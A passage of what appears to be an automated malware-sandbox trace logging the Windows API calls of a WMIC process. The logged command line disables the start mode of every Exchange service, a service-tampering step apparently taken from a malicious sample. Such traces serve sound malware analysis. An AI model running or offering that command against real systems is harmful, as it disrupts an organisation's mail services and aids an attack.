= 0x0 region_type = private name = "private_0x000000007efca000" filename = "" Region: id = 3995 start_va = 0x7efcd000 end_va = 0x7efcffff entry_point = 0x0 region_type = private name = "private_0x000000007efcd000" filename = "" Region: id = 3996 start_va = 0x7f0f3000 end_va = 0x7f0f5fff entry_point = 0x0 region_type = private name = "private_0x000000007f0f3000" filename = "" Region: id = 3997 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3998 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3999 start_va = 0x10d0000 end_va = 0x10e4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010d0000" filename = "" Region: id = 4000 start_va = 0x10d0000 end_va = 0x10f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010d0000" filename = "" Thread: id = 270 os_tid = 0xf74 [0116.529] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0116.529] __set_app_type (_Type=0x1) [0116.529] __p__fmode () returned 0x77ac4d6c [0116.529] __p__commode () returned 0x77ac5b1c [0116.529] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0116.530] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0116.530] ??0CHString@@QAE@XZ () returned 0x13495ec [0116.530] ??0CHString@@QAE@XZ () returned 0x13498fc [0116.530] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0116.530] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0116.530] _onexit (_Func=0x1340a20) returned 0x1340a20 [0116.530] _onexit (_Func=0x1340a30) returned 0x1340a30 [0116.530] _onexit (_Func=0x1340a50) returned 0x1340a50 [0116.530] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.531] ResolveDelayLoadedAPI () returned 0x770fcd50 [0116.531] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0116.532] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0116.537] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0xf034c8) returned 0x0 [0116.547] GetCurrentProcess () returned 0xffffffff [0116.547] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xdaf704 | out: TokenHandle=0xdaf704*=0x158) returned 1 [0116.547] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xdaf700 | out: TokenInformation=0x0, ReturnLength=0xdaf700) returned 0 [0116.547] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x1153a38, TokenInformationLength=0x118, ReturnLength=0xdaf700 | out: TokenInformation=0x1153a38, ReturnLength=0xdaf700) returned 1 [0116.547] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x1153a38*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0116.547] CloseHandle (hObject=0x158) returned 1 [0116.547] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.549] _vsnwprintf (in: _Buffer=0x1153ac8, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xdaf68c | out: _Buffer="ms_409") returned 6 [0116.549] GetComputerNameW (in: lpBuffer=0x1153b10, nSize=0xdaf6f0 | out: lpBuffer="LHNIWSJ", nSize=0xdaf6f0) returned 1 [0116.549] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.549] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.549] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0116.549] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xdaf704 | out: lpNameBuffer=0x0, nSize=0xdaf704) returned 0x0 [0116.550] GetLastError () returned 0xea [0116.550] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1153b50, nSize=0xdaf704 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0xdaf704) returned 0x1 [0116.550] lstrlenW (lpString="") returned 0 [0116.550] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.550] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0116.551] lstrlenW (lpString=".") returned 1 [0116.551] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.551] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0116.551] lstrlenW (lpString="LOCALHOST") returned 9 [0116.551] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.551] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0116.552] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.552] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.552] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0116.552] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.552] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.552] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.552] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.552] ResolveDelayLoadedAPI () returned 0x77bb9840 [0116.554] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.554] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.554] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.554] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.554] SysStringLen (param_1="IMPERSONATE") returned 0xb [0116.554] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.554] SysStringLen (param_1="IMPERSONATE") returned 0xb [0116.554] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.554] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.554] SysStringLen (param_1="IMPERSONATE") returned 0xb [0116.554] SysStringLen (param_1="DELEGATE") returned 0x8 [0116.554] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.554] SysStringLen (param_1="DELEGATE") returned 0x8 [0116.554] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.554] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.554] SysStringLen (param_1="DELEGATE") returned 0x8 [0116.554] SysStringLen (param_1="NONE") returned 0x4 [0116.554] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.554] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.554] SysStringLen (param_1="NONE") returned 0x4 [0116.554] SysStringLen (param_1="CONNECT") returned 0x7 [0116.554] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.554] SysStringLen (param_1="CALL") returned 0x4 [0116.554] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.554] SysStringLen (param_1="CALL") returned 0x4 [0116.555] SysStringLen (param_1="CONNECT") returned 0x7 [0116.555] SysStringLen (param_1="PKT") returned 0x3 [0116.555] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.555] SysStringLen (param_1="PKT") returned 0x3 [0116.555] SysStringLen (param_1="NONE") returned 0x4 [0116.555] SysStringLen (param_1="NONE") returned 0x4 [0116.555] SysStringLen (param_1="PKT") returned 0x3 [0116.555] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.555] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.555] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.555] SysStringLen (param_1="NONE") returned 0x4 [0116.555] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.555] SysStringLen (param_1="PKT") returned 0x3 [0116.555] SysStringLen (param_1="PKT") returned 0x3 [0116.555] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.555] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0116.555] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.555] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0116.555] SysStringLen (param_1="PKT") returned 0x3 [0116.555] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0116.555] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.555] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.555] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0116.555] GetSystemDirectoryW (in: lpBuffer=0x11529d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0116.555] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0116.555] SysStringLen (param_1="\\wbem\\") returned 0x6 [0116.556] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0116.556] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0116.556] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0116.556] GetCurrentThreadId () returned 0xf74 [0116.556] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xdaf214 | out: phkResult=0xdaf214*=0x164) returned 0x0 [0116.556] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xdaf220, lpcbData=0xdaf21c*=0x400 | out: lpType=0x0, lpData=0xdaf220*=0x30, lpcbData=0xdaf21c*=0x4) returned 0x0 [0116.556] _wcsicmp (_String1="0", _String2="1") returned -1 [0116.556] _wcsicmp (_String1="0", _String2="2") returned -2 [0116.556] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xdaf21c*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xdaf21c*=0x42) returned 0x0 [0116.556] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x1152be0, lpcbData=0xdaf21c*=0x42 | out: lpType=0x0, lpData=0x1152be0*=0x25, lpcbData=0xdaf21c*=0x42) returned 0x0 [0116.556] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0116.556] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0116.556] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xdaf220, lpcbData=0xdaf21c*=0x400 | out: lpType=0x0, lpData=0xdaf220*=0x36, lpcbData=0xdaf21c*=0xc) returned 0x0 [0116.556] _wtol (_String="65536") returned 65536 [0116.556] RegCloseKey (hKey=0x0) returned 0x6 [0116.556] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xdaf6b4 | out: ppv=0xdaf6b4*=0x11045a8) returned 0x0 [0116.564] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x11045a8, xmlSource=0xdaf634*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xdaf698 | out: isSuccessful=0xdaf698*=0xffff) returned 0x0 [0116.606] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x11045a8, DOMElement=0xdaf6ac | out: DOMElement=0xdaf6ac) returned 0x0 [0116.607] SysStringLen (param_1="VALUE") returned 0x5 [0116.607] SysStringLen (param_1="TABLE") returned 0x5 [0116.607] SysStringLen (param_1="TABLE") returned 0x5 [0116.607] SysStringLen (param_1="VALUE") returned 0x5 [0116.608] SysStringLen (param_1="LIST") returned 0x4 [0116.608] SysStringLen (param_1="TABLE") returned 0x5 [0116.608] SysStringLen (param_1="RAWXML") returned 0x6 [0116.608] SysStringLen (param_1="TABLE") returned 0x5 [0116.608] SysStringLen (param_1="RAWXML") returned 0x6 [0116.608] SysStringLen (param_1="LIST") returned 0x4 [0116.608] SysStringLen (param_1="LIST") returned 0x4 [0116.608] SysStringLen (param_1="RAWXML") returned 0x6 [0116.608] SysStringLen (param_1="HTABLE") returned 0x6 [0116.608] SysStringLen (param_1="TABLE") returned 0x5 [0116.608] SysStringLen (param_1="HTABLE") returned 0x6 [0116.608] SysStringLen (param_1="LIST") returned 0x4 [0116.609] SysStringLen (param_1="HFORM") returned 0x5 [0116.609] SysStringLen (param_1="TABLE") returned 0x5 [0116.609] SysStringLen (param_1="HFORM") returned 0x5 [0116.609] SysStringLen (param_1="LIST") returned 0x4 [0116.609] SysStringLen (param_1="HFORM") returned 0x5 [0116.609] SysStringLen (param_1="HTABLE") returned 0x6 [0116.609] SysStringLen (param_1="XML") returned 0x3 [0116.609] SysStringLen (param_1="TABLE") returned 0x5 [0116.609] SysStringLen (param_1="XML") returned 0x3 [0116.609] SysStringLen (param_1="VALUE") returned 0x5 [0116.609] SysStringLen (param_1="VALUE") returned 0x5 [0116.609] SysStringLen (param_1="XML") returned 0x3 [0116.610] SysStringLen (param_1="MOF") returned 0x3 [0116.610] SysStringLen (param_1="TABLE") returned 0x5 [0116.610] SysStringLen (param_1="MOF") returned 0x3 [0116.610] SysStringLen (param_1="LIST") returned 0x4 [0116.610] SysStringLen (param_1="MOF") returned 0x3 [0116.610] SysStringLen (param_1="RAWXML") returned 0x6 [0116.610] SysStringLen (param_1="LIST") returned 0x4 [0116.610] SysStringLen (param_1="MOF") returned 0x3 [0116.610] SysStringLen (param_1="CSV") returned 0x3 [0116.610] SysStringLen (param_1="TABLE") returned 0x5 [0116.610] SysStringLen (param_1="CSV") returned 0x3 [0116.610] SysStringLen (param_1="LIST") returned 0x4 [0116.610] SysStringLen (param_1="CSV") returned 0x3 [0116.610] SysStringLen (param_1="HTABLE") returned 0x6 [0116.610] SysStringLen (param_1="CSV") returned 0x3 [0116.610] SysStringLen (param_1="HFORM") returned 0x5 [0116.611] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.611] SysStringLen (param_1="TABLE") returned 0x5 [0116.611] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.611] SysStringLen (param_1="VALUE") returned 0x5 [0116.611] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.611] SysStringLen (param_1="XML") returned 0x3 [0116.611] SysStringLen (param_1="XML") returned 0x3 [0116.611] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.611] SysStringLen (param_1="texttablewsys") returned 0xd [0116.611] SysStringLen (param_1="TABLE") returned 0x5 [0116.611] SysStringLen (param_1="texttablewsys") returned 0xd [0116.611] SysStringLen (param_1="XML") returned 0x3 [0116.611] SysStringLen (param_1="texttablewsys") returned 0xd [0116.611] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.611] SysStringLen (param_1="XML") returned 0x3 [0116.611] SysStringLen (param_1="texttablewsys") returned 0xd [0116.612] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.612] SysStringLen (param_1="TABLE") returned 0x5 [0116.612] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.612] SysStringLen (param_1="XML") returned 0x3 [0116.612] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.612] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.612] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.612] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.612] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.612] SysStringLen (param_1="TABLE") returned 0x5 [0116.612] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.612] SysStringLen (param_1="XML") returned 0x3 [0116.612] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.612] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.612] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.612] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.612] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.612] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.613] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.613] SysStringLen (param_1="TABLE") returned 0x5 [0116.613] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.613] SysStringLen (param_1="XML") returned 0x3 [0116.613] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.613] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.613] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.613] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.613] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.613] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.613] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0116.613] SysStringLen (param_1="TABLE") returned 0x5 [0116.613] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0116.613] SysStringLen (param_1="XML") returned 0x3 [0116.613] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0116.613] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.613] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0116.613] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.613] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0116.613] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.613] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.613] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0116.614] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0116.614] SysStringLen (param_1="TABLE") returned 0x5 [0116.614] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0116.614] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.614] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0116.614] SysStringLen (param_1="XML") returned 0x3 [0116.614] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0116.614] SysStringLen (param_1="texttablewsys") returned 0xd [0116.614] SysStringLen (param_1="XML") returned 0x3 [0116.614] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0116.614] SysStringLen (param_1="htable-sortby") returned 0xd [0116.614] SysStringLen (param_1="TABLE") returned 0x5 [0116.614] SysStringLen (param_1="htable-sortby") returned 0xd [0116.614] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.614] SysStringLen (param_1="htable-sortby") returned 0xd [0116.614] SysStringLen (param_1="XML") returned 0x3 [0116.614] SysStringLen (param_1="htable-sortby") returned 0xd [0116.614] SysStringLen (param_1="texttablewsys") returned 0xd [0116.614] SysStringLen (param_1="htable-sortby") returned 0xd [0116.614] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0116.614] SysStringLen (param_1="XML") returned 0x3 [0116.614] SysStringLen (param_1="htable-sortby") returned 0xd [0116.615] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0116.615] SysStringLen (param_1="TABLE") returned 0x5 [0116.615] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0116.615] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.615] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0116.615] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.615] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0116.615] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.615] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.615] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0116.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0116.615] SysStringLen (param_1="TABLE") returned 0x5 [0116.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0116.615] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0116.615] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0116.615] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0116.615] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0116.615] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.616] SysStringLen (param_1="wmiclimofformat") returned 0xf [0116.616] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0116.616] SysStringLen (param_1="TABLE") returned 0x5 [0116.616] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0116.616] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.616] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0116.616] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.616] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0116.616] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.616] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.616] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0116.616] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0116.616] SysStringLen (param_1="TABLE") returned 0x5 [0116.616] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0116.616] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.616] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0116.616] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.616] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0116.616] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.616] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0116.617] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0116.617] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.617] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0116.617] FreeThreadedDOMDocument:IUnknown:Release (This=0x11045a8) returned 0x0 [0116.617] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'" [0116.617] memcpy_s (in: _Destination=0x1158060, _DestinationSize=0xae, _Source=0xef1588, _SourceSize=0xa0 | out: _Destination=0x1158060) returned 0x0 [0116.617] GetLocalTime (in: lpSystemTime=0xdaf65c | out: lpSystemTime=0xdaf65c*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0x9, wMilliseconds=0x1d6)) [0116.617] _vsnwprintf (in: _Buffer=0x1158118, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xdaf63c | out: _Buffer="04-15-2018T10:09:09") returned 19 [0116.617] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'") returned 76 [0116.617] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'") returned 76 [0116.617] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'") returned 76 [0116.617] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'") returned 76 [0116.617] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'") returned 76 [0116.617] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'") returned 76 [0116.617] lstrlenW (lpString="SERVICE") returned 7 [0116.617] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0116.618] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'") returned 76 [0116.618] lstrlenW (lpString="WHERE") returned 5 [0116.618] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0116.618] memmove_s (in: _Destination=0x1152c78, _DestinationSize=0x4, _Source=0x1152c68, _SourceSize=0x4 | out: _Destination=0x1152c78) returned 0x0 [0116.618] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'") returned 76 [0116.618] lstrlenW (lpString="'caption LIKE '%Exchange%''") returned 27 [0116.618] _wcsicmp (_String1="'caption LIKE '%Exchange%''", _String2="\"NULL\"") returned 5 [0116.618] lstrlenW (lpString="'caption LIKE '%Exchange%''") returned 27 [0116.618] lstrlenW (lpString="'caption LIKE '%Exchange%''") returned 27 [0116.618] memmove_s (in: _Destination=0x1157ef8, _DestinationSize=0x8, _Source=0x1152c78, _SourceSize=0x8 | out: _Destination=0x1157ef8) returned 0x0 [0116.618] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'") returned 76 [0116.618] lstrlenW (lpString="CALL") returned 4 [0116.618] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0116.618] memmove_s (in: _Destination=0x1158030, _DestinationSize=0xc, _Source=0x1157ef8, _SourceSize=0xc | out: _Destination=0x1158030) returned 0x0 [0116.618] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'") returned 76 [0116.618] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.618] _wcsicmp (_String1="ChangeStartMode", _String2="\"NULL\"") returned 65 [0116.618] memmove_s (in: _Destination=0x1152378, _DestinationSize=0x10, _Source=0x1158030, _SourceSize=0x10 | out: _Destination=0x1152378) returned 0x0 [0116.618] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'") returned 76 [0116.618] lstrlenW (lpString="'Disabled'") returned 10 [0116.618] _wcsicmp (_String1="'Disabled'", _String2="\"NULL\"") returned 5 [0116.618] lstrlenW (lpString="'Disabled'") returned 10 [0116.618] lstrlenW (lpString="'Disabled'") returned 10 [0116.618] lstrlenW (lpString="QUIT") returned 4 [0116.618] lstrlenW (lpString="SERVICE") returned 7 [0116.618] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, 